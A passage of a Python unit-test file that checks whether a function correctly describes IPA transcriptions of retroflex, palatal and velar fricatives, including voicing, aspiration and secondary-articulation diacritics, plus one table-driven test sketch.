self.assertEqual(actual, expected)
def test_ʂ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized retroflex fricative pulmonic egressive consonant
def test_ʐʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐʰˠ")
self.assertEqual(actual, expected)
def test_ʐ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ʂ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized retroflex fricative pulmonic egressive consonant
def test_ʐʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐʰˤ")
self.assertEqual(actual, expected)
def test_ʐ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ʂ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless palatal fricative pulmonic egressive consonant
def test_ç_is_the_representation_of_the_voiceless_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç")
self.assertEqual(actual, expected)
def test_ç̊_is_the_representation_of_the_voiceless_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̊")
self.assertEqual(actual, expected)
def test_ç̥_is_the_representation_of_the_voiceless_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̥")
self.assertEqual(actual, expected)
def test_ʝ̊_is_the_representation_of_the_voiceless_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊")
self.assertEqual(actual, expected)
def test_ʝ̥_is_the_representation_of_the_voiceless_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥")
self.assertEqual(actual, expected)
# voiceless labialized palatal fricative pulmonic egressive consonant
def test_çʷ_is_the_representation_of_the_voiceless_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çʷ")
self.assertEqual(actual, expected)
def test_ç̊ʷ_is_the_representation_of_the_voiceless_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̊ʷ")
self.assertEqual(actual, expected)
def test_ç̥ʷ_is_the_representation_of_the_voiceless_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̥ʷ")
self.assertEqual(actual, expected)
def test_ʝ̊ʷ_is_the_representation_of_the_voiceless_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ʷ")
self.assertEqual(actual, expected)
def test_ʝ̥ʷ_is_the_representation_of_the_voiceless_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized palatal fricative pulmonic egressive consonant
def test_çʲ_is_the_representation_of_the_voiceless_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çʲ")
self.assertEqual(actual, expected)
def test_ç̊ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̊ʲ")
self.assertEqual(actual, expected)
def test_ç̥ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̥ʲ")
self.assertEqual(actual, expected)
def test_ʝ̊ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ʲ")
self.assertEqual(actual, expected)
def test_ʝ̥ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized palatal fricative pulmonic egressive consonant
def test_çˠ_is_the_representation_of_the_voiceless_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çˠ")
self.assertEqual(actual, expected)
def test_ç̊ˠ_is_the_representation_of_the_voiceless_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̊ˠ")
self.assertEqual(actual, expected)
def test_ç̥ˠ_is_the_representation_of_the_voiceless_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̥ˠ")
self.assertEqual(actual, expected)
def test_ʝ̊ˠ_is_the_representation_of_the_voiceless_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ˠ")
self.assertEqual(actual, expected)
def test_ʝ̥ˠ_is_the_representation_of_the_voiceless_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized palatal fricative pulmonic egressive consonant
def test_çˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çˤ")
self.assertEqual(actual, expected)
def test_ç̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̊ˤ")
self.assertEqual(actual, expected)
def test_ç̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̥ˤ")
self.assertEqual(actual, expected)
def test_ʝ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ˤ")
self.assertEqual(actual, expected)
def test_ʝ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated palatal fricative pulmonic egressive consonant
def test_çʰ_is_the_representation_of_the_voiceless_aspirated_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çʰ")
self.assertEqual(actual, expected)
def test_ʝ̥ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ʰ")
self.assertEqual(actual, expected)
def test_ʝ̊ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized palatal fricative pulmonic egressive consonant
def test_çʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çʰʷ")
self.assertEqual(actual, expected)
def test_ʝ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʝ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized palatal fricative pulmonic egressive consonant
def test_çʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çʰʲ")
self.assertEqual(actual, expected)
def test_ʝ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʝ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized palatal fricative pulmonic egressive consonant
def test_çʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çʰˠ")
self.assertEqual(actual, expected)
def test_ʝ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʝ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized palatal fricative pulmonic egressive consonant
def test_çʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çʰˤ")
self.assertEqual(actual, expected)
def test_ʝ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʝ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced palatal fricative pulmonic egressive consonant
def test_ʝ_is_the_representation_of_the_voiced_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ")
self.assertEqual(actual, expected)
def test_ç̬_is_the_representation_of_the_voiced_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬")
self.assertEqual(actual, expected)
# voiced labialized palatal fricative pulmonic egressive consonant
def test_ʝʷ_is_the_representation_of_the_voiced_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝʷ")
self.assertEqual(actual, expected)
def test_ç̬ʷ_is_the_representation_of_the_voiced_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized palatal fricative pulmonic egressive consonant
def test_ʝʲ_is_the_representation_of_the_voiced_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝʲ")
self.assertEqual(actual, expected)
def test_ç̬ʲ_is_the_representation_of_the_voiced_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized palatal fricative pulmonic egressive consonant
def test_ʝˠ_is_the_representation_of_the_voiced_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝˠ")
self.assertEqual(actual, expected)
def test_ç̬ˠ_is_the_representation_of_the_voiced_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized palatal fricative pulmonic egressive consonant
def test_ʝˤ_is_the_representation_of_the_voiced_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝˤ")
self.assertEqual(actual, expected)
def test_ç̬ˤ_is_the_representation_of_the_voiced_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated palatal fricative pulmonic egressive consonant
def test_ʝʰ_is_the_representation_of_the_voiced_aspirated_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝʰ")
self.assertEqual(actual, expected)
def test_ʝ̬ʰ_is_the_representation_of_the_voiced_aspirated_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̬ʰ")
self.assertEqual(actual, expected)
def test_ç̬ʰ_is_the_representation_of_the_voiced_aspirated_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized palatal fricative pulmonic egressive consonant
def test_ʝʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝʰʷ")
self.assertEqual(actual, expected)
def test_ʝ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ç̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized palatal fricative pulmonic egressive consonant
def test_ʝʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝʰʲ")
self.assertEqual(actual, expected)
def test_ʝ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ç̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized palatal fricative pulmonic egressive consonant
def test_ʝʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝʰˠ")
self.assertEqual(actual, expected)
def test_ʝ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ç̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized palatal fricative pulmonic egressive consonant
def test_ʝʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝʰˤ")
self.assertEqual(actual, expected)
def test_ʝ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ç̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʰˤ")
self.assertEqual(actual, expected)
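# The palatal fricative cases above all repeat one pattern: a transcription
# string maps to one fixed description. A table-driven variant (a sketch only;
# it assumes nothing beyond the same describe_transcription function and
# unittest's subTest) could cover such a group without one method per symbol:
def test_palatal_fricative_description_table(self):
    # Expected strings restated verbatim from the individual cases above.
    cases = {
        "ç": "voiceless palatal fricative pulmonic egressive consonant",
        "ʝ": "voiced palatal fricative pulmonic egressive consonant",
        "çʷ": "voiceless labialized palatal fricative pulmonic egressive consonant",
    }
    for transcription, description in cases.items():
        with self.subTest(transcription=transcription):
            self.assertEqual(describe_transcription(transcription), description)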
# voiceless velar fricative pulmonic egressive consonant
def test_x_is_the_representation_of_the_voiceless_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velar fricative pulmonic egressive consonant"
actual = describe_transcription("x")
self.assertEqual(actual, expected)
def test_x̊_is_the_representation_of_the_voiceless_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̊")
self.assertEqual(actual, expected)
def test_x̥_is_the_representation_of_the_voiceless_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̥")
self.assertEqual(actual, expected)
def test_ɣ̊_is_the_representation_of_the_voiceless_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊")
self.assertEqual(actual, expected)
def test_ɣ̥_is_the_representation_of_the_voiceless_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥")
self.assertEqual(actual, expected)
# voiceless labialized velar fricative pulmonic egressive consonant
def test_xʷ_is_the_representation_of_the_voiceless_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xʷ")
self.assertEqual(actual, expected)
def test_x̊ʷ_is_the_representation_of_the_voiceless_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̊ʷ")
self.assertEqual(actual, expected)
def test_x̥ʷ_is_the_representation_of_the_voiceless_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̥ʷ")
self.assertEqual(actual, expected)
def test_ɣ̊ʷ_is_the_representation_of_the_voiceless_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ʷ")
self.assertEqual(actual, expected)
def test_ɣ̥ʷ_is_the_representation_of_the_voiceless_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized velar fricative pulmonic egressive consonant
def test_xʲ_is_the_representation_of_the_voiceless_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xʲ")
self.assertEqual(actual, expected)
def test_x̊ʲ_is_the_representation_of_the_voiceless_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̊ʲ")
self.assertEqual(actual, expected)
def test_x̥ʲ_is_the_representation_of_the_voiceless_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̥ʲ")
self.assertEqual(actual, expected)
def test_ɣ̊ʲ_is_the_representation_of_the_voiceless_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ʲ")
self.assertEqual(actual, expected)
def test_ɣ̥ʲ_is_the_representation_of_the_voiceless_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized velar fricative pulmonic egressive consonant
def test_xˠ_is_the_representation_of_the_voiceless_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xˠ")
self.assertEqual(actual, expected)
def test_x̊ˠ_is_the_representation_of_the_voiceless_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̊ˠ")
self.assertEqual(actual, expected)
def test_x̥ˠ_is_the_representation_of_the_voiceless_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̥ˠ")
self.assertEqual(actual, expected)
def test_ɣ̊ˠ_is_the_representation_of_the_voiceless_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ˠ")
self.assertEqual(actual, expected)
def test_ɣ̥ˠ_is_the_representation_of_the_voiceless_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized velar fricative pulmonic egressive consonant
def test_xˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xˤ")
self.assertEqual(actual, expected)
def test_x̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̊ˤ")
self.assertEqual(actual, expected)
def test_x̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̥ˤ")
self.assertEqual(actual, expected)
def test_ɣ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ˤ")
self.assertEqual(actual, expected)
def test_ɣ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated velar fricative pulmonic egressive consonant
def test_xʰ_is_the_representation_of_the_voiceless_aspirated_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar fricative pulmonic egressive consonant"
actual = describe_transcription("xʰ")
self.assertEqual(actual, expected)
def test_ɣ̥ʰ_is_the_representation_of_the_voiceless_aspirated_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ʰ")
self.assertEqual(actual, expected)
def test_ɣ̊ʰ_is_the_representation_of_the_voiceless_aspirated_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized velar fricative pulmonic egressive consonant
def test_xʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xʰʷ")
self.assertEqual(actual, expected)
def test_ɣ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɣ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized velar fricative pulmonic egressive consonant
def test_xʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xʰʲ")
self.assertEqual(actual, expected)
def test_ɣ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɣ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized velar fricative pulmonic egressive consonant
def test_xʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xʰˠ")
self.assertEqual(actual, expected)
def test_ɣ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɣ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized velar fricative pulmonic egressive consonant
def test_xʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xʰˤ")
